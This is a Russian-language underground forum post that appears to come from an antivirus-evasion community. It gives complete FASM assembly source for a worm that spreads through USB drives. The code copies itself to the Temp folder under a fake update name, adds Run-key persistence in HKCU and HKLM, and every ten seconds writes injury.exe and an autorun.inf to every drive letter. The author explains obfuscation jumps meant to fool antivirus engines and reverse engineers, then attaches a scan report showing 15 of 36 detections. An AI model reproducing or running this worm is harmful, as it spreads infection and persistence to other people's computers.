 |
|
SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN
| Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!! |
|
|||||||
| Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
|
|
Опции темы | Опции просмотра |
10-02-2014
|
#1 |
[FASM] Простенькое распространение по флешкам
Как пример работы с WinApi.
Сразу скажу: "Неожиданные" переходы в коде сделаны для того, что бы запутать некоторых тупых АВ. Код:
include 'win32ax.inc' section '.data' data readable writeable AutoKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0 ValueName db 'S_Update',0 FileName db 'kb3748594.exe',0 db 0 db 0 db 0 autoruninf_1 db '[autorun]',0Dh,0Ah,'Open=injury.exe',0Dh,0Ah, 'icon=%SystemRoot%\system32\SHELL32.dll,4',0Dh,0Ah, 'action=Open folder to view files',0Dh,0Ah,'shell\open=Open',0Dh,0Ah,'shell\open\command=injury.exe',0Dh,0Ah,'shell\open\default=1',0 db 0 db 0 db 0 AutoFile db 'autorun.inf',0 db 0 db 0 db 0 CFile db 'injury.exe',0 db 0 db 0 db 0 slash db ':\',0 db 0 db 0 db 0 hkey dd ? nBufferLength dw ? IpBuffer db MAX_PATH dup(0) nTempLength dw ? IpTempPath db MAX_PATH dup(0) db 0 db 0 db 0 disk dd 0 drive dd 0 temp dd 0 FileHandle dd ? section '.code' code readable executable start: jmp @end_1 @anti_1: invoke GetModuleFileName, 0, nBufferLength, IpBuffer invoke lstrcat, IpTempPath, FileName invoke CopyFile, IpBuffer, IpTempPath, 0 invoke RegCreateKeyEx, HKEY_CURRENT_USER,AutoKey,NULL,NULL,NULL,KEY_ALL_ACCESS,NULL,hkey,NULL invoke lstrlen,IpTempPath jmp @end_2 @anti_2: invoke RegCloseKey,[hkey] mov eax,0x02EB00EB jmp $-4 invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE,AutoKey,NULL,NULL,NULL,KEY_ALL_ACCESS,NULL,hkey,NULL invoke lstrlen,IpTempPath invoke RegSetValueEx,[hkey],ValueName,NULL,REG_SZ,IpTempPath,eax invoke RegCloseKey,[hkey] @circle: mov [disk], 65 @infect: invoke lstrcpy, drive, disk invoke lstrcat, drive, slash invoke lstrcpy, temp, drive invoke lstrcat, temp, CFile invoke CopyFile, IpBuffer, temp, 0 invoke lstrcpy, temp, drive invoke lstrcat, temp, AutoFile invoke CreateFile, temp, GENERIC_WRITE+GENERIC_READ,FILE_SHARE_READ,0,CREATE_ALWAYS,0,0 mov [FileHandle],eax invoke lstrlen, autoruninf_1 invoke WriteFile, [FileHandle], autoruninf_1,eax,ebx,0 invoke CloseHandle, [FileHandle] inc [disk] cmp [disk], 91 jnz @infect push 10000 call [Sleep] jmp @circle push 0 call [ExitProcess] @end_1: invoke GetTempPath, nTempLength, IpTempPath jmp @anti_1 @end_2: nop nop invoke RegSetValueEx,[hkey],ValueName,NULL,REG_SZ,IpTempPath,eax jmp @anti_2 y db '../../gcc/gcc/config/i386/w32-shared-ptr.c',0 .end start И так, если вы такой же тролль как бернс, то предпоследняя строчка в коде сделана для того, что бы запутать некоторых реверсеров. И так: Копирование в папку Temp с именем "kb3748594.exe" и добавление на автозагрузку с именем ключа "S_Update" Каждые 10 секунд копирование по всем доступным дискам с именем injury.exe и создание autorun.inf файла. Для умников: ExitProcess тут не нужен, можете убрать. Сделан для того, что бы запутать реверсеров... Да да, есть такие, которые путаются. ( Если вы бернс, то сразу скажу - это не я ). В данной строчке: Код:
invoke WriteFile, [FileHandle], autoruninf_1,eax,ebx,0 Название файла: injury.exe Размер файла: 3072 байт Дата сканирования: Mon, 10 Feb 14 09:49:45 -0500 MD5-хэш файла: 30f474da61cfe8616f3092282b5063d8 Результат: 15 из 36 Ad-Aware: BehavesLike.Win32.Malware.tsc (mx-v) AhnLab V3 Internet Security: OK ArcaVir: OK Avast: Win32:Evo-gen Susp AVG: LuaHeur.Win32/DH{Aw8LeA} Avira: OK Bitdefender/BullGuard: Gen:Trojan.Heur.PT.amW@aWG4Lgp BullGuard Internet Security 2013: Gen:Trojan.Heur.PT.amW@aWG4Lgp Comodo: OK Dr.Web: OK Emsisoft Anti-Malware (a-squared Anti-Malware): Gen:Trojan.Heur.PT.amW@aWG4Lgp (B) eScan Internet Security Suite 14: Gen:Trojan.Heur.PT.amW@aWG4Lgp (DB) Fortinet 5: OK F-Prot: OK F-Secure 2014: Gen:Trojan.Heur.PT.amW@aWG4Lgp G Data: Virus: Gen:Trojan.Heur.PT.amW@aWG4Lgp (Engine A) IKARUS: OK Immunet/ClamAV: OK K7 Ultimate: Riskware ( 0040eff71 ) Kaspersky Internet Security 2014: HEUR:Worm.Win32.Generic McAfee Total Protection 2013: OK Microsoft Security Essentials: Worm:Win32/Autorun.gen!BQ NANO: OK NOD32: OK Norman: win32:win32/SB/NetworkWorm Norton Internet Security: OK Outpost Security Suite Pro 8.0: OK Quick Heal: OK Sophos: Mal/SillyFDC-A SUPERAntiSpyware: OK Total Defense Internet Security: OK Trendmicro Titanium Internet Security: OK Twister Antivirus 8: OK VBA: OK VIPRE Internet Security 2013: BehavesLike.Win32.Malware.tsc (mx-v) Virit: OK Scan report generated by Scanner.FuckAV.ru |
|
|
| Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
| Метки |
| fasm, internet, invoke, iptemppath, null, parameter, блеать, простенькое, распространение, случайных, флешкам |
| Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
| Опции темы | |
| Опции просмотра | |
Древовидный вид
|
|
Похожие темы
|
||||
| Тема | Автор | Раздел | Ответов | Последнее сообщение |
| Программирование в FASM | IBM | Статьи | 2 | 21-01-2014 10:28 |
| Массированное распространение троянов | ihtr3 | Статьи | 9 | 11-09-2013 23:04 |
| FASM Packer | Wazzup | Assembler | 13 | 15-07-2013 14:57 |
| ищу способ по распространение ботиков | regedit | Помощь | 2 | 13-08-2012 14:31 |
| Быстрое распространение вирусов в сети! | DJ Keylogger | Статьи | 0 | 18-11-2011 10:05 |
Часовой пояс GMT +3, время: 15:19.